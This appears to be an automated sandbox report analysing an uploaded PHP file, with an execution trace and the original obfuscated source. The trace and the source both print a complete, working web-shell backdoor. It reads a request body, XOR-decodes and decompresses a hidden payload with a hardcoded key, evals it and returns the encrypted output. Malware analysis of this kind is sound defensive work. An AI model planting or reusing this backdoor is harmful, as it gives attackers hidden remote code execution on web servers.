PHP Malware Analysis
test1000.php
md5: 3ef55b993e8e09d39ee6ba948e9c0911
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
Execution
- eval (Traces)
Files
- file_get_contents (Traces)
Input
Deobfuscated PHP code
Failed to deobfuscate codeExecution traces
data/traces/3ef55b993e8e09d39ee6ba948e9c0911_trace-1676240850.6967.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:27:56.594527]
1 0 1 0.000180 393528
1 3 0 0.000260 396592 {main} 1 /var/www/html/uploads/test1000.php 0 0
1 A /var/www/html/uploads/test1000.php 3 $j = ';$r#(#(=@b#(ase64_encode(@x(#(@gzc#(ompress(#(#($o),$k))#(;print(#("$p$#(kh$r$kf");}'
1 A /var/www/html/uploads/test1000.php 4 $R = 'MBU3CONVDXm#(#(Q";funct#(ion #(x($t,$k){$c=#(strlen(#($k);#($l=strl#(en#(($t);$o="'
1 A /var/www/html/uploads/test1000.php 5 $n = '";#(fo#(r($i=0#(;$i<$#(l;){fo#(r($j=0;($j<$c&#(&$i<$#(l);$j+#(+,#($i++){$o.#(=$t{#($i}^$k'
1 A /var/www/html/uploads/test1000.php 6 $b = 's("#(php:/#(/inpu#(t"),#($m)==1) {@o#(#(b_start();@#(eva#(l(@gzu#(ncompress(#(@x(@b'
1 A /var/www/html/uploads/test1000.php 7 $s = 'a#(se64_#(decod#(e($m[1])#(,$k)#());$o=@o#(b#(_get_conten#(ts();@#(ob_e#(n#(d_clean()'
1 A /var/www/html/uploads/test1000.php 8 $a = '$k="67#(8914a7#(";$kh="58#(6#(9492615#(7a";#($kf="469d55a#(a47#(8c#(";$p=#("wu#(gp'
2 4 0 0.000420 396592 str_replace 0 /var/www/html/uploads/test1000.php 9 3 'uc' '' 'creucaucucte_ucfuucnctucion'
2 4 1 0.000443 396728
2 4 R 'create_function'
1 A /var/www/html/uploads/test1000.php 9 $w = 'create_function'
1 A /var/www/html/uploads/test1000.php 10 $Z = '{$j}#(;#(}}return $#(o;}#(i#(f (@preg#(_match(#("/$#(kh(#(.+)$kf/",@fi#(le_get_conte#(nt'
2 5 0 0.000502 397272 str_replace 0 /var/www/html/uploads/test1000.php 11 3 '#(' '' '$k="67#(8914a7#(";$kh="58#(6#(9492615#(7a";#($kf="469d55a#(a47#(8c#(";$p=#("wu#(gpMBU3CONVDXm#(#(Q";funct#(ion #(x($t,$k){$c=#(strlen(#($k);#($l=strl#(en#(($t);$o="";#(fo#(r($i=0#(;$i<$#(l;){fo#(r($j=0;($j<$c&#(&$i<$#(l);$j+#(+,#($i++){$o.#(=$t{#($i}^$k{$j}#(;#(}}return $#(o;}#(i#(f (@preg#(_match(#("/$#(kh(#(.+)$kf/",@fi#(le_get_conte#(nts("#(php:/#(/inpu#(t"),#($m)==1) {@o#(#(b_start();@#(eva#(l(@gzu#(ncompress(#(@x(@ba#(se64_#(decod#(e($m[1])#(,$k)#());$o=@o#(b#(_get_conten#(ts();@#(ob_e#(n#(d_clean();$r'
2 5 1 0.000562 397880
2 5 R '$k="678914a7";$kh="58694926157a";$kf="469d55aa478c";$p="wugpMBU3CONVDXmQ";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
1 A /var/www/html/uploads/test1000.php 11 $l = '$k="678914a7";$kh="58694926157a";$kf="469d55aa478c";$p="wugpMBU3CONVDXmQ";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
2 6 0 0.000641 397144 create_function 0 /var/www/html/uploads/test1000.php 12 2 '' '$k="678914a7";$kh="58694926157a";$kf="469d55aa478c";$p="wugpMBU3CONVDXmQ";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
3 7 0 0.000752 405184 {internal eval} 1 /var/www/html/uploads/test1000.php 12 0
3 7 1 0.000773 405184
3 7 R NULL
2 6 1 0.000794 403816
2 6 R '\000lambda_10'
1 A /var/www/html/uploads/test1000.php 12 $g = '\000lambda_10'
2 8 0 0.000832 403752 __lambda_func 1 /var/www/html/uploads/test1000.php 12 0
2 A /var/www/html/uploads/test1000.php(12) : runtime-created function 1 $k = '678914a7'
2 A /var/www/html/uploads/test1000.php(12) : runtime-created function 1 $kh = '58694926157a'
2 A /var/www/html/uploads/test1000.php(12) : runtime-created function 1 $kf = '469d55aa478c'
2 A /var/www/html/uploads/test1000.php(12) : runtime-created function 1 $p = 'wugpMBU3CONVDXmQ'
3 9 0 0.000918 403808 file_get_contents 0 /var/www/html/uploads/test1000.php(12) : runtime-created function 1 1 'php://input'
3 9 1 0.000949 404544
3 9 R ''
3 10 0 0.000968 404528 preg_match 0 /var/www/html/uploads/test1000.php(12) : runtime-created function 1 3 '/58694926157a(.+)469d55aa478c/' '' NULL
3 10 1 0.001040 404688
3 10 R 0
2 8 1 0.001061 404448
1 3 1 0.001071 404448
0.001113 321736
TRACE END [2023-02-12 20:27:56.595500]
Generated HTML code
<html><head></head><body>����
</body></html>Original PHP code
���
<?php
$j=';$r#(#(=@b#(ase64_encode(@x(#(@gzc#(ompress(#(#($o),$k))#(;print(#("$p$#(kh$r$kf");}';
$R='MBU3CONVDXm#(#(Q";funct#(ion #(x($t,$k){$c=#(strlen(#($k);#($l=strl#(en#(($t);$o="';
$n='";#(fo#(r($i=0#(;$i<$#(l;){fo#(r($j=0;($j<$c&#(&$i<$#(l);$j+#(+,#($i++){$o.#(=$t{#($i}^$k';
$b='s("#(php:/#(/inpu#(t"),#($m)==1) {@o#(#(b_start();@#(eva#(l(@gzu#(ncompress(#(@x(@b';
$s='a#(se64_#(decod#(e($m[1])#(,$k)#());$o=@o#(b#(_get_conten#(ts();@#(ob_e#(n#(d_clean()';
$a='$k="67#(8914a7#(";$kh="58#(6#(9492615#(7a";#($kf="469d55a#(a47#(8c#(";$p=#("wu#(gp';
$w=str_replace('uc','','creucaucucte_ucfuucnctucion');
$Z='{$j}#(;#(}}return $#(o;}#(i#(f (@preg#(_match(#("/$#(kh(#(.+)$kf/",@fi#(le_get_conte#(nt';
$l=str_replace('#(','',$a.$R.$n.$Z.$b.$s.$j);
$g=$w('',$l);$g();
?>